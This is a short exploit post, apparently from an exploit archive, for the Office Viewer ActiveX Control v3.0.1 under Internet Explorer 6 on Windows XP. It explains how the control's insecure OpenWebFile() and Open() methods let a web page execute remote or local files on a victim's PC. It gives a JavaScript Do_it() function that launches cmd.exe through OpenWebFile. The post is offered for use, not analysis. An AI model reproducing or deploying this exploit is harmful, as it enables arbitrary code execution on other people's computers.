=======================================================================================
Author: Houssamix
=======================================================================================
Office Viewer ActiveX Control v 3.0.1 Remote File execution exploit
download : http://www.anydraw.com/download/EOfficeOCX.exe
Tested on Windows XP Professional SP2 , with Internet Explorer 6
description : this use to insecure methods "OpenWebFile()" for execute remote file in pc victime
u can also execute a local file in pc victime usign this methode "Open()" , just change the function do_it with this :
function Do_it()
{
File = "c:\\windows\\system32\\cmd.exe"
hsmx.OpenWebFile(File)
}
=======================================================================================